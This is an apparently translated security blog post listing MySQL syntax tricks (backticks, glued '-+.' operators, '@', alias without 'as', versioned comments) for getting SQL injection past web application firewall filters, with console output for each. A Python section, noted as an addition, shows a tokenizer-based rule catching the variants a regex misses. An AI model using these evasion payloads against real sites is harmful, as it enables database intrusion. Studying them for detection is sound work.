WAF bypass techniques
2015-06-01 16:30
197 views
I have studied WAFs from China and abroad, and here I share a few tricks.
Techniques everyone already knows, such as /*!*/ and SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM, will not be repeated here.
The following uses MySQL as the example for these techniques:
Tip 1: the magic backtick ` (the control character seen in the formatted table output)
Bypasses spaces and some regex matches.

mysql> select`version`()
    -> ;
+----------------------+
| `version`()          |
+----------------------+
| 5.1.50-community-log |
+----------------------+
1 row in set (0.00 sec)

A more interesting trick: this control character can also act as a comment character (under certain conditions).

mysql> select id from qs_admins where id=1;`dfff and comment it;
+----+
| id |
+----+
|  1 |
+----+
1 row in set (0.00 sec)

usage: where id ='0'`'xxxxcomment on.

Tip 2: the magic - + .
(Note: these are three symbols, -, + and .)

mysql> select id from qs_admins;
+----+
| id |
+----+
|  1 |
+----+
1 row in set (0.00 sec)

mysql> select+id-1+1.from qs_admins;
+----------+
| +id-1+1. |
+----------+
|        1 |
+----------+
1 row in set (0.00 sec)

mysql> select-id-1+3.from qs_admins;
+----------+
| -id-1+3. |
+----------+
|        1 |
+----------+
1 row in set (0.00 sec)

(Some people keep asking how to get past keyword filtering. When a from ... is filtered, this is how you glue the tokens together to get through.)

Tip 3: @

mysql> select@^1.from qs_admins;
+------+
| @^1. |
+------+
| NULL |
+------+

This is the bypass for a former dedeCMS filter.

Tip 4: mysql function() as xxx also works without the as and the space

mysql> select-count(id)test from qs_admins;
+------+
| test |
+------+
|   -1 |
+------+
1 row in set (0.00 sec)

Tip 5: /*![>5000]*/ with a newly constructed version number (this one may be somewhat outdated)

mysql> /*!40000select*/ id from qs_admins;
+----+
| id |
+----+
|  1 |
+----+
1 row in set (0.00 sec)
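From the defender's side, what all five tips have in common is that each one breaks a signature that assumes whitespace between SQL keywords. The Python below is an example added here, not code from the original post or from any WAF product: it runs a whitespace-anchored regex beside a small tokenizer that follows MySQL's own lexing rules (backtick-quoted identifiers, the "1." number form that lets "1.from" split, and /*!NNNNN ... */ conditional comments whose body the server executes) over constructed inputs in the shapes shown above. The sample statements, the qs_admins table name and the KEYWORDS set are constructed for the example, and the tokenizer is a teaching model, not a complete MySQL lexer.

```python
import re

# Constructed sample statements in the shapes the post shows (not taken from any live system).
SAMPLES = [
    "select id from qs_admins",
    "select+id-1+1.from qs_admins",
    "select-id-1+3.from qs_admins",
    "select@^1.from qs_admins",
    "select-count(id)test from qs_admins",
    "/*!40000select*/ id from qs_admins",
    "select`version`()",
]

# A whitespace-anchored signature of the kind these tricks are aimed at.
NAIVE_RULE = re.compile(r"\bselect\s+.+\s+from\s+", re.I)


def naive_rule_hits(sql: str) -> bool:
    """True when the regex signature fires; it needs literal whitespace around the keywords."""
    return NAIVE_RULE.search(sql) is not None


# Teaching tokenizer (assumed simplification, not a full MySQL lexer). Alternatives are tried
# in order, so the conditional-comment opener wins over the ordinary comment pattern.
TOKEN_RE = re.compile(r"""
    (?P<cond>/\*!\d*)                                  # opener of an executed conditional comment
  | (?P<cend>\*/)                                      # comment closer, dropped from the stream
  | (?P<comment>/\*.*?\*/|--[ \t][^\n]*|\#[^\n]*)      # ordinary comments: ignored by the server
  | (?P<ident>`[^`]*`)                                 # backtick-quoted identifier
  | (?P<str>'(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*")       # string literal
  | (?P<num>\d+\.?\d*)                                 # number; MySQL accepts a trailing dot
  | (?P<word>[A-Za-z_][A-Za-z0-9_$]*)                  # keyword or unquoted identifier
  | (?P<ws>\s+)
  | (?P<op>[^\s\w`'"])                                 # single operator / punctuation character
  | (?P<other>.)                                       # fallback so tokenizing never fails
""", re.VERBOSE | re.DOTALL)


def mysql_tokens(sql: str) -> list:
    """Return (kind, text) pairs for the parts of sql the server would actually execute."""
    tokens, pos = [], 0
    while pos < len(sql):
        m = TOKEN_RE.match(sql, pos)
        pos = m.end()
        kind = m.lastgroup
        if kind in ("ws", "comment", "cond", "cend"):
            continue  # whitespace and comment markers carry no meaning to the server
        text = m.group().lower() if kind == "word" else m.group()
        tokens.append((kind, text))
    return tokens


# Constructed keyword set for the demonstration; a real rule set would be much larger.
KEYWORDS = {"select", "from", "union", "where", "and", "or"}


def keyword_sequence(sql: str) -> list:
    """SQL keywords in execution order, with every whitespace and comment trick removed."""
    return [text for kind, text in mysql_tokens(sql) if kind == "word" and text in KEYWORDS]


def token_rule_hits(sql: str) -> bool:
    """Fire on a SELECT that is followed by a FROM anywhere later in the keyword sequence."""
    kws = keyword_sequence(sql)
    if "select" not in kws:
        return False
    return "from" in kws[kws.index("select") + 1:]


def compare_rules(samples=SAMPLES) -> dict:
    """Map each sample to (naive_regex_hit, tokenizer_hit)."""
    return {s: (naive_rule_hits(s), token_rule_hits(s)) for s in samples}


if __name__ == "__main__":
    for sql, (naive, tok) in compare_rules().items():
        print(f"{sql:40} regex={naive!s:5} tokens={tok}")
```

Running the script prints one line per sample: the regex fires only on the plain "select id from qs_admins", while the tokenizer sees SELECT ... FROM in every variant except the bare select`version`(), which has no FROM at all. The design point is that normalization to tokens has to happen before any pattern matching; every trick in the post exploits a rule that matches the raw byte string instead.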
91ri.org editor's note: WAFs, as one barrier against intruders, are being strengthened step by step. Studying the various techniques for bypassing such protections also helps security researchers recognize their own shortcomings and keep pushing forward. The ideas and way of thinking above are genuinely impressive.
Good things deserve to be shared with everyone.
Related articles: "Bypassing WAFs with MySQL implicit type conversion", "Bypassing WAF interception via HTTP parameter pollution"
link: http://drops.wooyun.org/tips/132 (slightly modified from the original)
Original article: http://www.91ri.org/6372.html